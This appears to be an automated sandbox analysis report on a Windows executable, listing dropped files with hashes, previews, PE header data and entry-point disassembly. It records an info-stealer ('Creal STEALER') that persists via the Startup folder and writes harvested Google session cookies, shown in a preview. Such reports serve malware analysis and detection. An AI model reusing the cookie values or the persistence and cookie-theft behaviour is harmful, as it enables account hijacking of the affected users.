                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1500440
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.588676275246953
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24576:iTqtyGkxOc+wv05tP5kf82Hr/74YPF5o/P/gnAracr7/24UcypY7w0vpZUFv++b:hk0jwv4tP5kf8ar/74EF2/An4acrVUcc
                                                                                                                                                                                                                                                                                                MD5:C1161C1CEC57C5FFF89D10B62A8E2C3A
                                                                                                                                                                                                                                                                                                SHA1:C4F5DEA84A295EC3FF10307A0EA3BA8D150BE235
                                                                                                                                                                                                                                                                                                SHA-256:D1FD3040ACDDF6551540C2BE6FF2E3738F7BD4DFD73F0E90A9400FF784DD15E6
                                                                                                                                                                                                                                                                                                SHA-512:D545A6DC30F1D343EDF193972833C4C69498DC4EA67278C996426E092834CB6D814CE98E1636C485F9B1C47AD5C68D6F432E304CD93CEED0E1E14FEAF39B104A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......SJ...+...+...+...S...+...T...+...T...+...T...+...T...+..\S...+...+...+..-....+..-....+..-.n..+..-....+..Rich.+..................PE..d......e.........." ...%............................................................M7....`..........................................d...".............................../..........P...T...............................@...............@............................text...x........................... ..`.rdata..f...........................@..@.data....G.......>..................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1137944
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.462202215180296
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12288:hrEHdcM6hbFCjJ43w9hIpCQvb0QN8MdIEQ+U2BNNmD+99FfciFt:hrEXYCjfk7bPNfv42BN6yzUiFt
                                                                                                                                                                                                                                                                                                MD5:04F35D7EEC1F6B72BAB9DAF330FD0D6B
                                                                                                                                                                                                                                                                                                SHA1:ECF0C25BA7ADF7624109E2720F2B5930CD2DBA65
                                                                                                                                                                                                                                                                                                SHA-256:BE942308D99CC954931FE6F48ED8CC7A57891CCBE99AAE728121BCDA1FD929AB
                                                                                                                                                                                                                                                                                                SHA-512:3DA405E4C1371F4B265E744229DCC149491A112A2B7EA8E518D5945F8C259CAD15583F25592B35EC8A344E43007AE00DA9673822635EE734D32664F65C9C8D9B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........K..K..K..B.q.M..^..I..^..F..^..C..^..H..qE.H.....I..K.....qE.J..qE.J..qE..J..qE..J..RichK..........................PE..d......e.........." ...%.>..........`*.......................................p............`.........................................p...X............P.......@.........../...`......P^..T............................]..@............P..p............................text....=.......>.................. ..`.rdata..\....P.......B..............@..@.data...X.... ......................@....pdata.......@......................@..@.rsrc........P......."..............@..@.reloc.......`.......,..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):133632
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.851293297484796
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:bPwB2zC1vwC3XetCf5RlRVFhLaNKPRyymoh5Lm9b0e:bIB2zkvwGXetCfDlRVlPRy85Lm9
                                                                                                                                                                                                                                                                                                MD5:3A80FEA23A007B42CEF8E375FC73AD40
                                                                                                                                                                                                                                                                                                SHA1:04319F7552EA968E2421C3936C3A9EE6F9CF30B2
                                                                                                                                                                                                                                                                                                SHA-256:B70D69D25204381F19378E1BB35CC2B8C8430AA80A983F8D0E8E837050BB06EF
                                                                                                                                                                                                                                                                                                SHA-512:A63BED03F05396B967858902E922B2FBFB4CF517712F91CFAA096FF0539CF300D6B9C659FFEE6BF11C28E79E23115FD6B9C0B1AA95DB1CBD4843487F060CCF40
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I^.f'..f'..f'......f'...&..f'...#..f'...$..f'.o.&..f'..."..f'...&..f'..f&..g'.o....f'.o.'..f'.o.%..f'.Rich.f'.................PE..d......d.........." .........................................................P............`..........................................................0..\....................@..$....v..T............................<..8............0..........@....................text...$........................... ..`.rdata......0......................@..@.data...x(......."..................@....pdata..............................@..@.rsrc...\....0......................@..@.reloc..$....@......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):304
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.884172523166926
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:FO1g2D1Qv3rocHDyzxbiEv3rocHDKJLmIrBNuYraqWTfqgqlB1Hwsv7OjPy:CgC1Qv79EkEv79cBNuMWfqnym7O7y
                                                                                                                                                                                                                                                                                                MD5:6C931EF1B6F855278DDA9B3D944038A5
                                                                                                                                                                                                                                                                                                SHA1:534ED390820CE27D07E5A01E91D2F17E90A43604
                                                                                                                                                                                                                                                                                                SHA-256:BC84DE95C3E3973587A50D19B09E39FDD1D5DB110913C0B269874A49CF0E9C08
                                                                                                                                                                                                                                                                                                SHA-512:541D247AA103AB949701E768E6C6C75DD6164569561FC26582E3000410B31B7CEC4DF8C9F8BE509FB9875E1CABEB16B701A540B89340BAFF280A5221AFE3F41A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:<--Creal STEALER BEST -->.....google.com.TRUE./.FALSE.2597573456.1P_JAR.2023-10-05-08...google.com.TRUE./.FALSE.2597573456.NID.511=orcSInoZBb6Srw0PdPMNeLGKsegfLi-tQnviho5hKJXKDNg0kXIPnfTcuwV5r7RqjT893pWGJF7klKqldBoj4rDJvxfFlgDOCcW9aKDnU9zIlUh2LP0vO8k3uT0gHJD1JvVAclkJnKwZG6hDAl62HrMxNrUeqSR-WF1J-l9YYgE..
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):51200
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8475592208333753
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOF30AvJ3qj/880C4pwE1:TeAFawNLopFgU10XJBORJ6px4p7
                                                                                                                                                                                                                                                                                                MD5:BE99679A2B018331EACD3A1B680E3757
                                                                                                                                                                                                                                                                                                SHA1:6E6732E173C91B0C3287AB4B161FE3676D33449A
                                                                                                                                                                                                                                                                                                SHA-256:C382A020682EDEE086FBC56D11E70214964D39318774A19B184672E9FD0DD3E0
                                                                                                                                                                                                                                                                                                SHA-512:9CFE1932522109D73602A342A15B7326A3E267B77FFF0FC6937B6DD35A054BF4C10ED79D34CA38D56330A5B325E08D8AFC786A8514C59ABB896864698B6DE099
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                                                                                MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                                                                                SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                                                                                SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                                                                                SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                                                                                MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                                                                                SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                                                                                SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                                                                                SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8475592208333753
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOF30AvJ3qj/880C4pwE1:TeAFawNLopFgU10XJBORJ6px4p7
                                                                                                                                                                                                                                                                                                MD5:BE99679A2B018331EACD3A1B680E3757
                                                                                                                                                                                                                                                                                                SHA1:6E6732E173C91B0C3287AB4B161FE3676D33449A
                                                                                                                                                                                                                                                                                                SHA-256:C382A020682EDEE086FBC56D11E70214964D39318774A19B184672E9FD0DD3E0
                                                                                                                                                                                                                                                                                                SHA-512:9CFE1932522109D73602A342A15B7326A3E267B77FFF0FC6937B6DD35A054BF4C10ED79D34CA38D56330A5B325E08D8AFC786A8514C59ABB896864698B6DE099
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):51200
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):13884221
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.996252563059832
                                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                                SSDEEP:393216:AIEkZgf8iq1+TtIiFGvvB5IjWqn6eCz1lypRXiWCoaa:rRbiq1QtIZX3ILn6esyaVoaa
                                                                                                                                                                                                                                                                                                MD5:A4FD5040DB03F0C04306AB7824320269
                                                                                                                                                                                                                                                                                                SHA1:32A4E4F1C7D0C0FE1BE81BDDECAFEB2303A8227B
                                                                                                                                                                                                                                                                                                SHA-256:52C7C34BCC42C907A275F706CDE7C03EAB24287F3AEC081F0BD88780DE131E7C
                                                                                                                                                                                                                                                                                                SHA-512:CA00C6C4CBD5DAB079CE204F9ADABBA1C748869D79A172BDF8AA434AA97DE4C3627273208ECD970159EAE432E5E3BF69E7E860A9CAE07E5A7918C98CD1D0E9C2
                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.Q...?...?...?.Z.<...?.Z.:...?.Z.;...?......?...:.9.?...;...?...<...?.Z.>...?...>...?.+.;...?.+.=...?.Rich..?.........................PE..d......e.........."....%.....^.................@.............................p............`.....................................................x....`....... ..."...........`..\...0..................................@............... ............................text............................... ..`.rdata...+.......,..................@..@.data...83..........................@....pdata..."... ...$..................@..@_RDATA..\....P......................@..@.rsrc........`......................@..@.reloc..\....`......................@..B................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.996252563059832
                                                                                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                                                                                • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                                                                                                • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                File name:HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File size:13'884'221 bytes
                                                                                                                                                                                                                                                                                                MD5:a4fd5040db03f0c04306ab7824320269
                                                                                                                                                                                                                                                                                                SHA1:32a4e4f1c7d0c0fe1be81bddecafeb2303a8227b
                                                                                                                                                                                                                                                                                                SHA256:52c7c34bcc42c907a275f706cde7c03eab24287f3aec081f0bd88780de131e7c
                                                                                                                                                                                                                                                                                                SHA512:ca00c6c4cbd5dab079ce204f9adabba1c748869d79a172bdf8aa434aa97de4c3627273208ecd970159eae432e5e3bf69e7e860a9cae07e5a7918c98cd1d0e9c2
                                                                                                                                                                                                                                                                                                SSDEEP:393216:AIEkZgf8iq1+TtIiFGvvB5IjWqn6eCz1lypRXiWCoaa:rRbiq1QtIZX3ILn6esyaVoaa
                                                                                                                                                                                                                                                                                                TLSH:99E6334273E15CFAD2E2617342728067AE76E4855721CB8F07B822951F5F3528E3AF72
                                                                                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.Q...?...?...?.Z.<...?.Z.:...?.Z.;...?.......?...:.9.?...;...?...<...?.Z.>...?...>...?.+.;...?.+.=...?.Rich..?................
                                                                                                                                                                                                                                                                                                Icon Hash:4a464cd47461e179
                                                                                                                                                                                                                                                                                                Entrypoint:0x14000c1f0
                                                                                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                Time Stamp:0x65C61AED [Fri Feb 9 12:30:37 2024 UTC]
                                                                                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                OS Version Major:5
                                                                                                                                                                                                                                                                                                OS Version Minor:2
                                                                                                                                                                                                                                                                                                File Version Major:5
                                                                                                                                                                                                                                                                                                File Version Minor:2
                                                                                                                                                                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                                                                                                                                                                Subsystem Version Minor:2
                                                                                                                                                                                                                                                                                                Import Hash:1af6c885af093afc55142c2f1761dbe8
                                                                                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                                                                sub esp, 28h
                                                                                                                                                                                                                                                                                                call 00007F42D4504FBCh
                                                                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                                                                add esp, 28h
                                                                                                                                                                                                                                                                                                jmp 00007F42D4504BCFh
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                                                                sub esp, 28h
                                                                                                                                                                                                                                                                                                call 00007F42D4505534h
                                                                                                                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                                                                                                                je 00007F42D4504D73h
                                                                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                                                                mov eax, dword ptr [00000030h]
                                                                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                                                                mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                                                                                                                jmp 00007F42D4504D57h
                                                                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                                                                cmp ecx, eax
                                                                                                                                                                                                                                                                                                je 00007F42D4504D66h
                                                                                                                                                                                                                                                                                                xor eax, eax
                                                                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                                                                cmpxchg dword ptr [0003427Ch], ecx
                                                                                                                                                                                                                                                                                                jne 00007F42D4504D40h
                                                                                                                                                                                                                                                                                                xor al, al
                                                                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                                                                add esp, 28h
                                                                                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                                                                                mov al, 01h
                                                                                                                                                                                                                                                                                                jmp 00007F42D4504D49h
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                inc eax
                                                                                                                                                                                                                                                                                                push ebx
                                                                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                                                                sub esp, 20h
                                                                                                                                                                                                                                                                                                movzx eax, byte ptr [00034267h]
                                                                                                                                                                                                                                                                                                test ecx, ecx
                                                                                                                                                                                                                                                                                                mov ebx, 00000001h
                                                                                                                                                                                                                                                                                                cmove eax, ebx
                                                                                                                                                                                                                                                                                                mov byte ptr [00034257h], al
                                                                                                                                                                                                                                                                                                call 00007F42D4505333h
                                                                                                                                                                                                                                                                                                call 00007F42D4506452h
                                                                                                                                                                                                                                                                                                test al, al
                                                                                                                                                                                                                                                                                                jne 00007F42D4504D56h
                                                                                                                                                                                                                                                                                                xor al, al
                                                                                                                                                                                                                                                                                                jmp 00007F42D4504D66h
                                                                                                                                                                                                                                                                                                call 00007F42D45133F1h
                                                                                                                                                                                                                                                                                                test al, al
                                                                                                                                                                                                                                                                                                jne 00007F42D4504D5Bh
                                                                                                                                                                                                                                                                                                xor ecx, ecx
                                                                                                                                                                                                                                                                                                call 00007F42D4506462h
                                                                                                                                                                                                                                                                                                jmp 00007F42D4504D3Ch
                                                                                                                                                                                                                                                                                                mov al, bl
                                                                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                                                                add esp, 20h
                                                                                                                                                                                                                                                                                                pop ebx
                                                                                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                inc eax
                                                                                                                                                                                                                                                                                                push ebx
                                                                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                                                                sub esp, 20h
                                                                                                                                                                                                                                                                                                cmp byte ptr [0003421Ch], 00000000h
                                                                                                                                                                                                                                                                                                mov ebx, ecx
                                                                                                                                                                                                                                                                                                jne 00007F42D4504DB9h
                                                                                                                                                                                                                                                                                                cmp ecx, 01h
                                                                                                                                                                                                                                                                                                jnbe 00007F42D4504DBCh
                                                                                                                                                                                                                                                                                                call 00007F42D450549Ah
                                                                                                                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                                                                                                                je 00007F42D4504D7Ah
                                                                                                                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x3cdcc0x78.rdata
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x460000xf41c.rsrc
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x420000x22a4.pdata
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x560000x75c.reloc
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x3a3300x1c.rdata
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
